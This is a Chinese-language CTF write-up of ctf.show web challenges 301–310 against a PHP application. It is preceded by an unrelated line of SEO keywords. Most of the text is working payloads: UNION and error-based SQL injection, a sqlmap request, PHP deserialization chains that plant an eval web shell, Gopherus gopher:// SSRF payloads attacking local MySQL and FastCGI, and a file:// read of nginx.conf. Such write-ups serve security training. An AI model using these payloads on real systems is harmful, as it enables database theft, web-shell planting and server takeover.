网页制作与网站开发用的软件,论坛网站需要多大的空间,知名网站建设公司好吗,企业邮箱登录入口手机网页版301#xff1a;多种方式进入
从index.php页面来看 只需要访问index.php时session[login]不为空就能访问 那么就在访问index.php的时候上传login 随机一个东西就能进去从checklogin页面来看sql注入没有任何过滤 直接联合绕过 密码随意
还有多种方式可以自己去看代码分析
30…301多种方式进入
从index.php页面来看 只需要访问index.php时session[login]不为空就能访问 那么就在访问index.php的时候上传login 随机一个东西就能进去从checklogin页面来看sql注入没有任何过滤 直接联合绕过 密码随意
还有多种方式可以自己去看代码分析
302和301同理
只是添加了一个strcasecmp对比两个有什么区别不区分大小写相同输出0
if(!strcasecmp(sds_decode($userpwd),$row[sds_password])){
还将密码加密了一下给union select ?? 这里的问好像下面一样加密一下
在传入未加密的数字
例如: 1234 加密以后3cd76fc2201d6959a8c1c63dbd906ec7 和301同样的解法
也是同样可以使用直接访问index.php然后传入session[login]任意一个东西,只要不为空
303: 会判断传入的username长度了其余不变 这里尝试弱口令
密码admin
账户admin
这里再dpt页面找到数据传输位置
这里会将传输数据给到aptadd文件 这里的数据执行insert命令插入到数据表里
$sqlinsert into sds_dpt set sds_name.$dpt_name.,
sds_address .$dpt_address.,sds_build_date.$dpt_build_year.,
sds_have_safe_card.$dpt_has_cert.,
sds_safe_card_num.$dpt_cert_number.,
sds_telephone.$dpt_telephone_number.;;这里利用报错注入
payload: and(select updatexml(1,concat(0x7e,(select substr(group_concat(flag),30,45) from sds_fl9g),0x7e),1))# 304: 增加了全局变量其他与303无差异
function sds_waf($str){return preg_match(/[0-9]|[a-z]|-/i, $str);
}
payload: and(select updatexml(1,concat(0x7e,(select substr(group_concat(flag)from sds_flaag,1,20)),0x7e),1))# 也可拿到sqlmap里去跑 1.txt文件内容 POST /dptadd.php HTTP/1.1 Host: e22b9690-cfab-425c-9cb7-2f9f6b750c26.challenge.ctf.show User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 112 Origin: http://e22b9690-cfab-425c-9cb7-2f9f6b750c26.challenge.ctf.show Connection: close Referer: http://e22b9690-cfab-425c-9cb7-2f9f6b750c26.challenge.ctf.show/dpt.php Cookie: PHPSESSIDl16so97igh43ejc1g0gua2bffn Upgrade-Insecure-Requests: 1 dpt_namesddpt_addressaddpt_build_year2024-03-06dpt_has_certondpt_cert_numbersdadpt_telephone_numberad sqlmap -r 1.txt --batch -D sds -T sds_flaag -C flag --dump
305: 存在反序列化漏洞 利用到file_put_contents可以写入shell 通过user传入再用蚁剑连接数据库获得flag 306: 反序列化
从代码层面看, 最后是要利用到 class.php文件 现在开始反推, 去找哪里用到了close函数 在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数), 这里就要用到__construct魔法函数, 当执行new实例化的时候就会调用, 一会儿再去找哪里实例化了dao这个类, 将$this-confignew config()修改为$this-conn-apt() 现在再去找哪里用new实例化了dao类 从这里嗯呢看到service.php文件里的__construct调用了new实例化dao payload:
?php
class log{public $title1.php;public $info?php eval($_POST[a]);?;
}class dao{private $config;private $conn;public function __construct(){$this-connnew log();}
}echo base64_encode(serialize(new dao)); 307:
从这里看依旧时反序列化 login.php 这里本还是想调用这里的奈何没有嗲用点 不过好在在dao.php文件看到了执行命令的函数 这里$this-config-cache_dir指向了config类里的cache_dir变量, 刚好又是个public公共便变量可以修改 并且server.php也找到了执行此函数的地方 payload:
class dao{private $config;public function __construct(){$this-confignew config();}
}class config{public $cache_dir ;echo \?php eval(\$_POST[a]);?\ 1.php;;
}echo base64_encode(serialize(new config));
308: SSRF漏洞
这里本来还是想在cache_dir做文章使用命令,奈何这里设置了白名单, 只能使用字母 但好在这里还存在ssrf漏洞 这里还能知道数据库密码为空那么可以直接使用root用户登录 这里利用Gopherus生成对mysql的ssrf注入 这里注意传入点在index.php payload(使用gopherus的mysql执行命令有条件, 不能有密码)
?php
class config{public $update_url gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%61%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01;
}
class dao{private $config;public function __construct(){$this-confignew config();}}
$anew dao();
echo base64_encode(serialize($a));
?
309依旧利用ssrf漏洞, 这一次需要打fastcgi
还是利用gopherus生成fastcgi的payload
poc:
?php
class config{public $update_url gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00;
}
class dao{private $config;public function __construct(){$this-confignew config();}}
$anew dao();
echo base64_encode(serialize($a));
?
310:
9000端口和6379端口都关了, 得做信息收集,通过field://协议访问本地文件
?php
class config{public $update_url file:///etc/nginx/nginx.conf;
}
class dao{private $config;public function __construct(){$this-confignew config();}}
$anew dao();
echo base64_encode(serialize($a));
?
这里从返回信息来看, 在监听4476端口flag在var里面 直接去访问获取flag
?php
class config{public $update_url http://127.0.0.1:4476;
}
class dao{private $config;public function __construct(){$this-confignew config();}}
echo base64_encode(serialize(new dao));
?
